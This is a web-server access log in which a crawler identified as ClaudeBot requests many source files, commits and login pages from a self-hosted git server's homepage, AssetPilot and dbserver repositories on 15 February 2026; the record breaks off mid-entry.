[Client 216.73.216.188] [Length 11122] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11914] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Services.tsx" [Client 216.73.216.188] [Length 832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" [Client 216.73.216.188] [Length 11043] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fmetadata.json" [Client 216.73.216.188] [Length 22920] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html?display=source" [Client 216.73.216.188] [Length 16351] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13427] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9774] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 216.73.216.188] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/bin" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js?display=source" [Client 216.73.216.188] [Length 25540] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" [Client 216.73.216.188] [Length 9975] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 10128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 13202] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 216.73.216.188] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore?display=source" [Client 216.73.216.188] [Length 18485] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 11179] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 216.73.216.188] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11905] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 20602] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode%2Fsettings.json" [Client 216.73.216.188] [Length 21864] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10886] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 216.73.216.188] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 9463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10885] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11353] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11319] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fstatic%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 34982] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 11179] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 27698] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fapp%2Ffetcher.py" [Client 216.73.216.188] [Length 30269] [Gzip 5.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 15988] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11773] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" [Client 216.73.216.188] [Length 9969] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" [Client 216.73.216.188] [Length 9849] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 22780] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 24437] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" [Client 216.73.216.188] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2FOpcTest+program+by+claude.md" [Client 216.73.216.188] [Length 34368] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FOpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 21761] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" [Client 216.73.216.188] [Length 9860] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/js/script.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py?display=source" [Client 216.73.216.188] [Length 12965] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css" [Client 216.73.216.188] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11319] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 216.73.216.188] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 1871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 216.73.216.188] [Length 11887] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 216.73.216.188] [Length 12246] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Ftsconfig.json" [Client 216.73.216.188] [Length 23694] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:00 +0000] - 200 200 - GET https 